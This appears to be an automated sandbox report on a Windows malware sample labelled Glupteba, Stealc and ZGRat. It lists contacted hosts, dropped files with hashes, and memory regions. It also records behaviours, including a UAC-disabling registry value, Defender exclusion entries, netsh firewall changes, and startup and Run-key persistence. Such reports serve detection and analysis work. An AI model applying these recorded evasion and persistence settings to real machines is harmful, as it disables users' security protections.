US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 vsblobprodscussu5shard20.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard20.blob.core.windows.net tcp
US 8.8.8.8:53 server9.thestatsfiles.ru udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.sipgate.net udp
US 3.33.249.248:3478 stun.sipgate.net udp
US 162.159.133.233:443 cdn.discordapp.com tcp
BG 185.82.216.96:443 server9.thestatsfiles.ru tcp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
DE 185.172.128.150:80 tcp
DE 185.172.128.150:80 tcp
DE 185.172.128.150:80 tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.150:443 westus2-2.in.applicationinsights.azure.com tcp
BG 185.82.216.96:443 server9.thestatsfiles.ru tcp
N/A 127.0.0.1:31465 tcp
BG 185.82.216.96:443 server9.thestatsfiles.ru tcp

Files

memory/2604-0-0x000007FEF5053000-0x000007FEF5054000-memory.dmp

memory/2604-1-0x0000000001060000-0x000000000108A000-memory.dmp

memory/2604-2-0x0000000000FA0000-0x0000000000FFE000-memory.dmp

memory/2604-3-0x000007FEF5050000-0x000007FEF5A3C000-memory.dmp

memory/2128-8-0x0000000002980000-0x0000000002A00000-memory.dmp

memory/2128-9-0x000000001B4B0000-0x000000001B792000-memory.dmp

memory/2128-10-0x0000000001C80000-0x0000000001C88000-memory.dmp

memory/2796-11-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2796-17-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2796-15-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2796-13-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2796-19-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2796-20-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2796-21-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2796-22-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tar2D0C.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\Local\Temp\Cab2D0D.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3be1cd8e8a989028f9df839489f2b3a4
SHA1 464eff20494b8b40e90af864d63415895a375b60
SHA256 61b06c55ae3ca320af282806ac68fcd8c83672544e7ca60277c88f8ac41af500
SHA512 39a5d3ed9e3c953af4a415ce91316a49abe978d3a7d2285884fcf0f6130bac10888481cbfd1ec5a578fdeb5d9dbad11264e746e7bd6d4d98f0be2b5fd52ca86c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a510c44149273e42339d145eb4b141d1
SHA1 8554ab55857c1e2152275ea08afeafbc74213d8b
SHA256 6ddd0e3f79d4ea6b2e4fd75ed2431e18cde4458b4b0b5ab4162f65fa3e073f7f
SHA512 048b5971fe2111e5ed02f4ac1b76f62dcb1901cbc87088a735f5064509864c33d256fbfe00197356fbba31cf0e83fdb550e93c4ca0d5e19402876da64969198d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8797a9bab9dc1c4ef157524b6ce678b4
SHA1 9d4963f11585e1740db82d7067dcd61ed3808f2f
SHA256 0add7a0cc2045d9fc5220f844d9fba333472ec58af809066babdb248f1ec9a28
SHA512 6ffd3fd65e3422ca1256ef5e22468e2cd6236ae825a27d077d2913659ed2dcd8d2d709aaa21a67d1ad3d2311a016af06649652cbceaa841f4b65fac5e5686d80

\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe

MD5 5b1e924864690254027a694596f93e64
SHA1 009944ff319f0d966db4f3997ba9f87692f7ce8f
SHA256 a227c8047a9b2cff19327b822c89378d4549f0baee2af1e7345e8ede3adbe29e
SHA512 bbb54905892328d16743d2d953df4ac2c10192ac76b4a99248f64d0c675d487bf74af007d52e2196e80bfa61e84fe7604c8f6be5620102bc1d7820dd89e2d798

\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe

MD5 9da2ccfd03fcc77b189df9df555b36bf
SHA1 9367ac8be24bfcd192bb6981f8e24b3c3cc630ec
SHA256 6cd1adb5a2be81ba9441b69bb45a493b58e82b58ad3e4f2c93861c23f9b38d88
SHA512 627cb25cbe42c1a444d13a3041644af00e59a20cc1590b7664a22a7596b10f279aec2f2d0dbac79616eca0457202cd1982fe7257134d653d15baa5fcd51cae8a

\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe

MD5 8938be9b1ac1f7cfc1104628fd55c164
SHA1 3f85babacf62c0443b17c7c5af470dd11648e3b3
SHA256 2f000b4830c2267d4b1d17231a5c249b79a0d62ff2bfd0ef3d01763a5d1b4d03
SHA512 ba2619bbc481c70d85eaf862b60e8cdf4c588540742a8343b057f95212468c41b1ea244376c9122feb69d236cfdc2c2d423c29acb458e40a12c947a398b55a92

memory/2308-249-0x00000000042B0000-0x00000000046A8000-memory.dmp

memory/2160-250-0x00000000041F0000-0x00000000045E8000-memory.dmp

memory/948-252-0x0000000004210000-0x0000000004608000-memory.dmp

\Users\Admin\AppData\Local\Temp\u1ls.0.exe

MD5 ac3b1a30e96b6d89ce98a21bb5b2093a
SHA1 4270104678195b8cad3520a704c556155a0a65b5
SHA256 803946c2712aec2b60b54b3cd7c3375a9a0158e7ccbfbd4ab8a66e6ddfc7d463
SHA512 65e74527ffa9d6e776d063db44322080315a5a9eb13bb67acd61be6e65862ec127366d742beca349c7ca8281e2f67193bafc14c8c0ee3f222b19b452d05c8491

memory/692-266-0x00000000041B0000-0x00000000045A8000-memory.dmp

\Users\Admin\AppData\Local\Temp\u1ls.1.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/2080-287-0x0000000000400000-0x0000000002597000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 9879d2f6426cfd242f8bf14e1b1497ce
SHA1 74933816cb70f25dae8f8e7d7f6fd6bc21872227
SHA256 7c7bdb740839e609b3cd04df32d30bbc7e800029375419371f9f83d9c69bea3f
SHA512 133cf38ace0da0414e35e4d93faee43910b0f899c7d600ff0cc8bcf0c6f3167df2e973b752a9fa042f0f3bf3c91ac3771c975c05eb6f05f3d9a27185379ac4d5

memory/2308-311-0x0000000000400000-0x0000000002957000-memory.dmp

memory/948-312-0x0000000000400000-0x0000000002957000-memory.dmp

memory/2160-313-0x0000000000400000-0x0000000002957000-memory.dmp

memory/692-314-0x0000000000400000-0x0000000002957000-memory.dmp

memory/2604-316-0x000007FEF5053000-0x000007FEF5054000-memory.dmp

memory/840-315-0x0000000000400000-0x0000000002574000-memory.dmp

memory/1608-317-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/2604-318-0x000007FEF5050000-0x000007FEF5A3C000-memory.dmp

memory/948-343-0x0000000000400000-0x0000000002957000-memory.dmp

memory/1728-344-0x0000000004210000-0x0000000004608000-memory.dmp

memory/2160-346-0x0000000000400000-0x0000000002957000-memory.dmp

memory/2308-345-0x0000000000400000-0x0000000002957000-memory.dmp

memory/692-347-0x0000000000400000-0x0000000002957000-memory.dmp

memory/2308-352-0x0000000000400000-0x0000000002957000-memory.dmp

memory/2160-353-0x0000000000400000-0x0000000002957000-memory.dmp

memory/692-354-0x0000000000400000-0x0000000002957000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 0f6de58ed7bc31e0f8f79b5301c6adad
SHA1 776cf3bbedde0d754dc0de3b52ff1a6485decb2e
SHA256 99c2851dcd6f349e087a2c8bb2839f9e09bbd94f6c75a1026b7ed31534341f24
SHA512 99535a0d27f57d72ce7181d8a71958daa59e6a4722ed18df000bbd6cd88ed345b43e143c27f4fc172f10dd48389f4538d0370b5caeea81a89e0215f85830ce75

memory/1332-363-0x0000000004280000-0x0000000004678000-memory.dmp

memory/1784-362-0x0000000004270000-0x0000000004668000-memory.dmp

memory/1728-373-0x0000000000400000-0x0000000002957000-memory.dmp

memory/832-374-0x00000000043F0000-0x00000000047E8000-memory.dmp

memory/1608-378-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/2932-379-0x00000000042A0000-0x0000000004698000-memory.dmp

memory/1608-380-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/2032-381-0x0000000000D80000-0x00000000045B4000-memory.dmp

memory/832-384-0x0000000000400000-0x0000000002957000-memory.dmp

memory/1332-383-0x0000000000400000-0x0000000002957000-memory.dmp

memory/1784-385-0x0000000000400000-0x0000000002957000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

memory/2368-391-0x0000000140000000-0x00000001405E8000-memory.dmp

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 f0616fa8bc54ece07e3107057f74e4db
SHA1 b33995c4f9a004b7d806c4bb36040ee844781fca
SHA256 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA512 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/2368-405-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 43d56c88d39f168ff893a9da3f186556
SHA1 b16f0b7153d9a187bd47cac26b3a9fcc30bab431
SHA256 04d40d86ff32023f5890dd8926199bb67036472d0028eff02241c7c2d39428b5
SHA512 72fa98226be84f12a0ce03520e5afac06913a18290623499d9e0a18ee32e9dd86cceee5693d65f0fef91e27ead7e572691b939f54af31f72fb1b00fa9ee4cd2f

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/2032-463-0x000000001EE30000-0x000000001EF3A000-memory.dmp

memory/2032-465-0x0000000000BD0000-0x0000000000BDC000-memory.dmp

memory/2032-464-0x0000000000540000-0x0000000000550000-memory.dmp

memory/2032-466-0x0000000000B10000-0x0000000000B24000-memory.dmp

memory/2032-467-0x000000001E490000-0x000000001E4B4000-memory.dmp

memory/2032-474-0x0000000000370000-0x000000000037A000-memory.dmp

memory/2032-475-0x00000000006D0000-0x00000000006FA000-memory.dmp

memory/2032-476-0x000000001F510000-0x000000001F5C2000-memory.dmp

memory/840-477-0x0000000000400000-0x0000000002574000-memory.dmp

memory/2032-478-0x0000000000380000-0x000000000038A000-memory.dmp

memory/2032-482-0x000000001FD60000-0x0000000020060000-memory.dmp

memory/2032-486-0x0000000000520000-0x000000000052A000-memory.dmp

memory/2032-485-0x0000000000520000-0x000000000052A000-memory.dmp

memory/2932-484-0x0000000000400000-0x0000000002957000-memory.dmp

memory/2032-487-0x00000000059C0000-0x00000000059CA000-memory.dmp

memory/2032-488-0x000000001E9A0000-0x000000001EA02000-memory.dmp

memory/2032-489-0x00000000059D0000-0x00000000059F2000-memory.dmp

memory/2032-492-0x000000001E300000-0x000000001E30C000-memory.dmp

memory/2032-497-0x0000000000520000-0x000000000052A000-memory.dmp

memory/2032-496-0x0000000000520000-0x000000000052A000-memory.dmp

memory/2932-499-0x0000000000400000-0x0000000002957000-memory.dmp

memory/2932-504-0x0000000000400000-0x0000000002957000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\63f93027eed6195cee9d6793abbff365863d6c04fe54f71a30d295ffeacda31a\e71d4ecc3a0a47099d52437ef9d6ac62.tmp

MD5 66c2705e059a053c7a2bee2e6a4e244b
SHA1 7a6bc287e6dfcc866315aefe8eb71d142d8d6935
SHA256 728ba6a9f43412932ab6e26174da8d3decc3caddafd2f29cf3432c89e8729a39
SHA512 6f63ad1626c2b5ca4970d153be109131a42ceff16e2419e25c130df23cacf45b6ab4f6dd63df63fb80e10f9df2f97e3403866568de0801b28a3da75ca1c8c77f

memory/2932-508-0x0000000000400000-0x0000000002957000-memory.dmp

memory/840-514-0x0000000000400000-0x0000000002574000-memory.dmp

memory/2932-515-0x0000000000400000-0x0000000002957000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

memory/1748-561-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/1748-565-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2320-568-0x0000000000400000-0x00000000008DF000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-08 23:52

Reported

2024-05-08 23:57

Platform

win10-20240404-en

Max time kernel

296s

Max time network

300s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\BvKx9NZLLBJyqhaHtH6KEhmS.exe = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\xelY93icznpSl0utJlO9CTlz.exe = "0" C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\VaEY2hreTfB69fav3nHOe8uJ.exe = "0" C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\7nW5qIMaV8xajTNolXyNnr62.exe = "0" C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A

ZGRat

rat zgrat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IhdA8kGYCJ7pM22YuVOKDfB6.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\K7gZzdgjUiY3QyM00vsQEIk5.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8pQJacl2Bf7LzHavCMG3hKLj.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lM3zkzFQczpDAHvJH7vWTU0q.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uHu5gmDPrdHQrxBALgEWcRKb.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vUN0CKZe3wKRDvMmRMVSstse.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vjZEleAXp56EtwGN39UQAyp2.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\BvKx9NZLLBJyqhaHtH6KEhmS.exe = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\xelY93icznpSl0utJlO9CTlz.exe = "0" C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\7nW5qIMaV8xajTNolXyNnr62.exe = "0" C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\VaEY2hreTfB69fav3nHOe8uJ.exe = "0" C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
